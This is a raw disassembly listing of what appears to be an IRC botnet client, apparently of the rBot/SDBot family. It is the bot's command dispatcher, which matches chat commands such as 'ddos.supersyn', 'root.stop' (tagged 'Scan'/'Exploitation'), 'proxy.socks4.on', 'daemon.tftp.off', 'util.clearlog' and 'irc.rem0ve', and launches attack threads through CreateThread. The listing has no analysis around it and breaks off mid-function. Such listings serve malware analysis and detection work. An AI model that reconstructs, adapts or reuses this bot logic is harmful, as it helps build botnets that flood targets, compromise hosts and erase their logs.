loc_40D890: ; CODE XREF: sub_40D2E0+5B47�j
; sub_40D2E0+5E96�j ...
call sub_40A627
pop ecx
loc_40D896: ; CODE XREF: sub_40D2E0+5FAB�j
pop ecx
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_40D89C: ; CODE XREF: sub_40D2E0+560�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_42E468
push eax
call sub_415480
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
push [ebp+var_90]
push offset aPart ; "PART"
call sub_4158A0
add esp, 18h
test eax, eax
jnz loc_40D6A7
lea eax, [ebp+var_2DC]
push eax
mov eax, [ebp+var_94]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_40D69C
; ---------------------------------------------------------------------------
loc_40D8FD: ; CODE XREF: sub_40D2E0+582�j
push [ebp+var_90]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_4158A0
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_40D951
push [ebp+var_90]
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40D951
push [ebp+var_90]
push offset dword_42E464
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_4133B5
cmp ds:dword_42ACD0, ebx
jz loc_4133B5
loc_40D951: ; CODE XREF: sub_40D2E0+637�j
; sub_40D2E0+649�j
push [ebp+var_90]
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40DADD
push [ebp+var_90]
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_40DADD
mov eax, [ebp+var_88]
inc [ebp+var_84]
push 4
mov [ebp+var_8C], eax
pop esi
mov [ebp+var_C0], esi
loc_40D998: ; CODE XREF: sub_40D2E0+8B9�j
; sub_40D2E0+94D�j ...
shl esi, 2
mov eax, [ebp+esi+var_94]
lea edi, [ebp+esi+var_94]
push eax
push offset dword_42E45C
mov [ebp+arg_8], eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40DDDD
push [ebp+esi+var_90]
push offset aSend_0 ; "SEND"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40DC98
cmp [ebp+var_AC], ebx
jz loc_40DC6E
push [ebp+esi+var_8C]
mov edi, offset aS_2 ; "%s"
lea eax, [ebp+var_6F4]
push edi
push eax
call sub_415480
add esp, 0Ch
lea eax, [ebp+var_708]
push [ebp+esi+var_88]
push edi
push eax
call sub_415480
push [ebp+esi+var_84]
call sub_4159EF
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_416D30
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_42E418
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_414F2C
add esp, 1Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40AEC8
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz loc_40DC5D
loc_40DAC7: ; CODE XREF: sub_40D2E0+7FB�j
cmp [ebp+var_560], ebx
jnz loc_40DC90
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_40DAC7
; ---------------------------------------------------------------------------
loc_40DADD: ; CODE XREF: sub_40D2E0+681�j
; sub_40D2E0+697�j
push [ebp+var_90]
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40DAF6
mov [ebp+var_4], 1
loc_40DAF6: ; CODE XREF: sub_40D2E0+80D�j
cmp [ebp+var_8C], ebx
jz loc_40D6A7
push (offset loc_4259A3+1)
push [ebp+var_8C]
call sub_415A50
pop ecx
test eax, eax
pop ecx
jz short loc_40DB1D
cmp [ebp+var_4], ebx
jz short loc_40DB29
loc_40DB1D: ; CODE XREF: sub_40D2E0+836�j
lea eax, [ebp+var_D8]
mov [ebp+var_8C], eax
loc_40DB29: ; CODE XREF: sub_40D2E0+83B�j
cmp [ebp+var_88], ebx
jz loc_40D6A7
inc [ebp+var_88]
jz short loc_40DB75
cmp [ebp+arg_10], ebx
jz short loc_40DB75
lea eax, [ebp+var_928]
push eax
call sub_415C80
push eax
lea eax, [ebp+var_928]
push [ebp+var_88]
push eax
call sub_416EC0
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_C0], esi
jmp short loc_40DB7B
; ---------------------------------------------------------------------------
loc_40DB75: ; CODE XREF: sub_40D2E0+85B�j
; sub_40D2E0+860�j
mov esi, [ebp+var_C0]
loc_40DB7B: ; CODE XREF: sub_40D2E0+893�j
mov edi, [ebp+esi*4+var_94]
cmp edi, ebx
jz loc_40D6A7
push edi
push offset dword_42E40C
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40D998
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz short loc_40DC1E
mov eax, ds:dword_4C8E40
mov eax, ds:off_42ADE0[eax*4]
cmp [eax], bl
jz short loc_40DC1E
push eax
push ecx
push offset dword_42E3F0
push [ebp+arg_4]
call sub_40BAA1
add esp, 10h
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset aSHasJustVersio ; "%s has just versioned me."
push eax
call sub_415480
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
add esp, 10h
cmp [ebp+var_AC], ebx
jnz loc_40D6A7
push ebx
lea eax, [ebp+var_2DC]
push 1
push eax
push offset dword_4C8D4C
loc_40DC0E: ; CODE XREF: sub_40D2E0+58C1�j
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_40DC1E: ; CODE XREF: sub_40D2E0+8C8�j
; sub_40D2E0+8D8�j
push edi
push offset dword_42E3CC
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40D998
mov eax, [ebp+esi*4+var_90]
cmp eax, ebx
jz loc_40D998
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz loc_40D998
push eax
push ecx
push offset dword_42E3B4
jmp loc_40D69C
; ---------------------------------------------------------------------------
loc_40DC5D: ; CODE XREF: sub_40D2E0+7E1�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42E36C
jmp loc_40DDC9
; ---------------------------------------------------------------------------
loc_40DC6E: ; CODE XREF: sub_40D2E0+702�j
lea eax, [ebp+var_D8]
push eax
push [ebp+esi+var_8C]
push offset dword_42E31C
loc_40DC81: ; CODE XREF: sub_40D2E0+6177�j
; sub_40D2E0+61DE�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 10h
loc_40DC90: ; CODE XREF: sub_40D2E0+7ED�j
; sub_40D2E0+AB1�j ...
push 1
pop esi
jmp loc_40F56E
; ---------------------------------------------------------------------------
loc_40DC98: ; CODE XREF: sub_40D2E0+6F6�j
push [ebp+esi+var_90]
push offset aChat ; "CHAT"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40DDF3
cmp [ebp+var_AC], ebx
jz loc_40DDBD
push 13h
call sub_415174
test eax, eax
pop ecx
jnz loc_40DDAF
push [ebp+esi+var_88]
lea eax, [ebp+var_708]
push offset aS_2 ; "%s"
push eax
call sub_415480
push [ebp+esi+var_84]
call sub_4159EF
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_416D30
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_42E2E4
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 13h
push eax
call sub_414F2C
add esp, 18h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40A965
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_40DDA1
loc_40DD8B: ; CODE XREF: sub_40D2E0+ABF�j
cmp [ebp+var_560], ebx
jnz loc_40DC90
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_40DD8B
; ---------------------------------------------------------------------------
loc_40DDA1: ; CODE XREF: sub_40D2E0+AA9�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42E2A0
jmp short loc_40DDC9
; ---------------------------------------------------------------------------
loc_40DDAF: ; CODE XREF: sub_40D2E0+9E9�j
lea eax, [ebp+var_D8]
push eax
push offset dword_42E260
jmp short loc_40DDC9
; ---------------------------------------------------------------------------
loc_40DDBD: ; CODE XREF: sub_40D2E0+9D9�j
lea eax, [ebp+var_D8]
push eax
push offset dword_42E220
loc_40DDC9: ; CODE XREF: sub_40D2E0+989�j
; sub_40D2E0+ACD�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
jmp loc_40DC90
; ---------------------------------------------------------------------------
loc_40DDDD: ; CODE XREF: sub_40D2E0+6DB�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, ds:byte_42ACDC
mov [edi], ecx
jnz loc_40D6A7
loc_40DDF3: ; CODE XREF: sub_40D2E0+9CD�j
mov edi, [edi]
mov [ebp+arg_8], edi
push edi
mov edi, offset aC_0 ; "c"
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4133BD
push [ebp+arg_8]
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4133BD
cmp [ebp+var_AC], ebx
jnz short loc_40DE43
push [ebp+var_90]
push offset dword_42E464
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_4133B5
loc_40DE43: ; CODE XREF: sub_40D2E0+B47�j
cmp [ebp+arg_28], ebx
jnz loc_4133B5
xor edi, edi
cmp ds:dword_42AE8C, ebx
jle loc_40DFEF
mov [ebp+arg_20], offset dword_43B140
loc_40DE61: ; CODE XREF: sub_40D2E0+BA0�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40DE87
add [ebp+arg_20], 0B8h
inc edi
cmp edi, ds:dword_42AE8C
jl short loc_40DE61
jmp loc_40DFEF
; ---------------------------------------------------------------------------
loc_40DE87: ; CODE XREF: sub_40D2E0+B90�j
push offset asc_42E574 ; " :"
push [ebp+arg_0]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz loc_40D6A7
mov cl, ds:byte_42ACDC
imul edi, 0B8h
mov [eax+2], cl
mov cl, ds:byte_42ACDC
mov [eax+3], cl
lea ecx, dword_43B158[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_416D30
lea eax, [ebp+esi+var_54]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_40DEDC: ; CODE XREF: sub_40D2E0+CA4�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD_0 ; "$%d-"
push eax
call sub_415480
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_415A50
add esp, 14h
test eax, eax
jz short loc_40DF48
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_40DF48
lea eax, dword_43B140[edi]
push eax
call sub_415C80
add [ebp+var_C], eax
pop ecx
jz short loc_40DF7A
mov eax, [ebp+arg_C]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40DF7A
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_408E1D
add esp, 0Ch
jmp short loc_40DF7A
; ---------------------------------------------------------------------------
loc_40DF48: ; CODE XREF: sub_40D2E0+C24�j
; sub_40D2E0+C2B�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_40DF7A
lea eax, [ebp+var_B8]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_416D30
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_408E1D
add esp, 18h
loc_40DF7A: ; CODE XREF: sub_40D2E0+C3D�j
; sub_40D2E0+C51�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_40DEDC
lea eax, [ebp+esi+var_54]
mov [ebp+arg_20], 10h
mov edi, eax
loc_40DF97: ; CODE XREF: sub_40D2E0+D03�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD ; "$%d"
push eax
call sub_415480
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_415A50
add esp, 14h
test eax, eax
jz short loc_40DFDA
mov eax, [edi]
cmp eax, ebx
jz short loc_40DFDA
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_408E1D
add esp, 0Ch
loc_40DFDA: ; CODE XREF: sub_40D2E0+CDF�j
; sub_40D2E0+CE5�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_40DF97
mov [ebp+var_DC], 1
loc_40DFEF: ; CODE XREF: sub_40D2E0+B74�j
; sub_40D2E0+BA2�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, ds:byte_42ACDC
jz short loc_40E008
cmp [ebp+var_DC], ebx
jz loc_40E1ED
loc_40E008: ; CODE XREF: sub_40D2E0+D1A�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe_0 ; "$me"
push edi
call sub_408E1D
lea eax, [ebp+var_D8]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_408E1D
push [ebp+var_8C]
push offset aChan ; "$chan"
push edi
call sub_408E1D
push ebx
push ebx
lea eax, [ebp+var_B8]
push 2
push eax
call sub_41416F
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_408E1D
add esp, 40h
push [ebp+arg_14]
push offset aServer_0 ; "$server"
push edi
call sub_408E1D
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_415A50
add esp, 14h
loc_40E07A: ; CODE XREF: sub_40D2E0+E86�j
test eax, eax
jz loc_40E16B
push edi
push [ebp+arg_0]
call sub_415A50
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B8]
push eax
call sub_416D30
lea eax, [ebp+var_B8]
push offset asc_42E1DC ; ")"
push eax
call sub_416C8F
add esp, 1Ch
cmp [ebp+var_B8], 30h
jl short loc_40E0C6
cmp [ebp+var_B8], 39h
jle short loc_40E0DC
loc_40E0C6: ; CODE XREF: sub_40D2E0+DDB�j
push 3
lea eax, [ebp+var_B8]
push offset a63 ; "63"
push eax
call sub_416D30
add esp, 0Ch
loc_40E0DC: ; CODE XREF: sub_40D2E0+DE4�j
lea eax, [ebp+var_B8]
push eax
call sub_4159EF
test eax, eax
pop ecx
jle short loc_40E0FF
lea eax, [ebp+var_B8]
push eax
call sub_4159EF
pop ecx
mov [ebp+var_14], al
jmp short loc_40E110
; ---------------------------------------------------------------------------
loc_40E0FF: ; CODE XREF: sub_40D2E0+E0B�j
call sub_4154DC
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_40E110: ; CODE XREF: sub_40D2E0+E1D�j
lea eax, [ebp+var_B8]
mov [ebp+var_13], bl
push eax
call sub_415C80
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_415500
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_B8]
push [ebp+arg_10]
push eax
call sub_416D30
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_408E1D
push edi
push [ebp+arg_0]
call sub_415A50
add esp, 30h
jmp loc_40E07A
; ---------------------------------------------------------------------------
loc_40E16B: ; CODE XREF: sub_40D2E0+D9C�j
mov edi, 1FFh
lea eax, [ebp+var_FB0]
push edi
push [ebp+arg_0]
push eax
call sub_416D30
lea eax, [ebp+var_FB0]
push edi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_416D30
lea eax, [ebp+var_11B0]
push offset asc_425D24 ; " "
push eax
call sub_416C8F
add esp, 20h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+arg_10], 1Fh
loc_40E1BB: ; CODE XREF: sub_40D2E0+EF0�j
push offset asc_425D24 ; " "
push ebx
call sub_416C8F
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+arg_10]
pop ecx
jnz short loc_40E1BB
mov ecx, [ebp+esi+var_94]
lea eax, [ebp+esi+var_94]
cmp ecx, ebx
jz loc_40D6A7
add ecx, 3
mov [eax], ecx
loc_40E1ED: ; CODE XREF: sub_40D2E0+D22�j
mov edi, [ebp+esi+var_94]
push edi
push offset aIrc_rndnick ; "irc.rndnick"
mov [ebp+arg_8], edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413363
push edi
push offset aRn ; "rn"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413363
push edi
push offset aIrc_die ; "irc.die"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413341
push edi
push offset aIrc_di ; "irc.di"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413341
push edi
push offset aIrc_logout ; "irc.logout"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41329F
push edi
push offset aLo ; "lo"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41329F
push edi
push offset aIrc_version ; "irc.version"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413290
push edi
push offset aVer ; "ver"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413290
push edi
push offset aLockdown_on ; "lockdown.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41317B
push edi
push offset aLd_on ; "ld.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41317B
push edi
push offset aLockdown_off ; "lockdown.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41317B
push edi
push offset aLd_off ; "ld.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41317B
push edi
push offset aProxy_socks4_o ; "proxy.socks4.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413059
push edi
push offset aProxy_s4_on ; "proxy.s4.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413059
push edi
push offset aProxy_socks4_0 ; "proxy.socks4.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E35D
push [ebp+esi+var_90]
push 11h
push offset aServer ; "Server"
push offset dword_42E124
loc_40E341: ; CODE XREF: sub_40D2E0+10A1�j
; sub_40D2E0+10C7�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_4151BA
add esp, 20h
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_40E35D: ; CODE XREF: sub_40D2E0+104C�j
push edi
push offset aDaemon_rlogin_ ; "daemon.rlogin.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E383
push [ebp+esi+var_90]
push 6
push offset aServer ; "Server"
push offset dword_42E100
jmp short loc_40E341
; ---------------------------------------------------------------------------
loc_40E383: ; CODE XREF: sub_40D2E0+108C�j
push edi
push offset dword_42E0F0
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E3A9
push [ebp+esi+var_90]
push 3
push offset aServer ; "Server"
push offset dword_42E0E4
jmp short loc_40E341
; ---------------------------------------------------------------------------
loc_40E3A9: ; CODE XREF: sub_40D2E0+10B2�j
push edi
push offset dword_42E0DC
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E3D2
push [ebp+esi+var_90]
push 1Dh
push offset dword_42E0D0
push offset dword_42E0C4
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E3D2: ; CODE XREF: sub_40D2E0+10D8�j
push edi
push offset aProxy_redirect ; "proxy.redirect.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E3FB
push [ebp+esi+var_90]
push 10h
push offset dword_42E0A0
push offset dword_42E090
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E3FB: ; CODE XREF: sub_40D2E0+1101�j
push edi
push offset dword_42E084
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E424
push [ebp+esi+var_90]
push 0Ah
push offset dword_42E078
push offset dword_42E06C
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E424: ; CODE XREF: sub_40D2E0+112A�j
push edi
push offset dword_42E05C
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E44D
push [ebp+esi+var_90]
push 0Bh
push offset dword_42E050
push offset dword_42E044
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E44D: ; CODE XREF: sub_40D2E0+1153�j
push edi
push offset dword_42E034
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E476
push [ebp+esi+var_90]
push 0Fh
push offset dword_42E028
push offset dword_42E01C
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E476: ; CODE XREF: sub_40D2E0+117C�j
push edi
push offset dword_42E00C
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E49F
push [ebp+esi+var_90]
push 0Eh
push offset dword_42E000
push offset dword_42DFF4
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E49F: ; CODE XREF: sub_40D2E0+11A5�j
push edi
push offset aDaemon_tftp_of ; "daemon.tftp.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E4C8
push [ebp+esi+var_90]
push 4
push offset aServer ; "Server"
push offset dword_42DFD8
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E4C8: ; CODE XREF: sub_40D2E0+11CE�j
push edi
push offset aUtil_findfile_ ; "util.findfile.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413041
push edi
push offset aUtil_ff_off ; "util.ff.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413041
push edi
push offset aCom_procs_off ; "com.procs.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413029
push edi
push offset aCom_ps_off ; "com.ps.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413029
push edi
push offset aClone_off ; "clone.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E545
push [ebp+esi+var_90]
push 18h
push offset aClone ; "Clone"
push offset dword_42DF78
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E545: ; CODE XREF: sub_40D2E0+124B�j
push edi
push offset aLockdown_stop ; "lockdown.stop"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E56E
push [ebp+esi+var_90]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset dword_42DF50
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E56E: ; CODE XREF: sub_40D2E0+1274�j
push edi
push offset aRoot_stop ; "root.stop"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E597
push [ebp+esi+var_90]
push 8
push offset aScan ; "Scan"
push offset aExploitation ; "Exploitation"
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40E597: ; CODE XREF: sub_40D2E0+129D�j
push edi
push offset aRoot_stats ; "root.stats"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413013
push edi
push offset aRoot_st ; "root.st"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_413013
push edi
push offset aIrc_reconnect ; "irc.reconnect"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412FF2
push edi
push offset aIrc_r ; "irc.r"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412FF2
push edi
push offset aIrc_disconnect ; "irc.disconnect"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412FD0
push edi
push offset aIrc_d ; "irc.d"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412FD0
push edi
push offset aIrc_quit ; "irc.quit"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412F88
push edi
push offset aIrc_q ; "irc.q"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412F88
push edi
push offset aIrc_status ; "irc.status"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412F49
push edi
push offset aIrc_s ; "irc.s"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412F49
push edi
push offset aIrc_id ; "irc.id"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412F3D
push edi
push offset aIrc_i ; "irc.i"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412F3D
push edi
push offset aCom_rebewt ; "com.rebewt"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40E6E5
call sub_409266
test eax, eax
mov eax, offset dword_42DE78
jnz short loc_40E6B7
mov eax, offset dword_42DE44
loc_40E6B7: ; CODE XREF: sub_40D2E0+13D0�j
push eax
lea eax, [ebp+var_2DC]
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 1Ch
jmp loc_40DC90
; ---------------------------------------------------------------------------
loc_40E6E5: ; CODE XREF: sub_40D2E0+13C2�j
push edi
push offset aThreads_list ; "threads.list"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412E4C
push edi
push offset aThreads_l ; "threads.l"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412E4C
push edi
push offset aIrc_aliases ; "irc.aliases"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412E2C
push edi
push offset aIrc_al ; "irc.al"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412E2C
push edi
push offset aIrc_log ; "irc.log"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412D39
push edi
push offset aIrc_lg ; "irc.lg"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412D39
push edi
push offset aUtil_clearlog ; "util.clearlog"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412D20
push edi
push offset aUtil_clg ; "util.clg"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412D20
push edi
push offset aCom_netinfo ; "com.netinfo"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412CEE
push edi
push offset aCom_ni ; "com.ni"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412CEE
push edi
push offset aDdos_supersyn ; "ddos.supersyn"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40E8C7
mov edi, [ebp+esi+var_90]
push 7Fh
lea eax, [ebp+var_76C]
push edi
push eax
call sub_416D30
mov eax, [ebp+esi+var_8C]
push 7Fh
mov [ebp+arg_18], eax
push eax
lea eax, [ebp+var_6EC]
push eax
call sub_416D30
mov esi, [ebp+esi+var_88]
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_416D30
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_416D30
mov eax, [ebp+var_4]
add esp, 30h
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push esi
mov [ebp+var_564], eax
mov eax, [ebp+arg_4]
push [ebp+arg_18]
mov [ebp+var_770], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_42DD84
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 14h
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_401831
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_40E8B6
loc_40E8A0: ; CODE XREF: sub_40D2E0+15D4�j
cmp [ebp+var_560], ebx
jnz loc_412A7A
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_40E8A0
; ---------------------------------------------------------------------------
loc_40E8B6: ; CODE XREF: sub_40D2E0+15BE�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42DD38
jmp loc_41206B
; ---------------------------------------------------------------------------
loc_40E8C7: ; CODE XREF: sub_40D2E0+14E6�j
push edi
push offset aCom_sysinfo ; "com.sysinfo"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412CC0
push edi
push offset aCom_si ; "com.si"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412CC0
push edi
push offset aIrc_rem0ve ; "irc.rem0ve"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412C86
push edi
push offset aIrc_rm0 ; "irc.rm0"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412C86
push edi
push offset aCom_procs ; "com.procs"
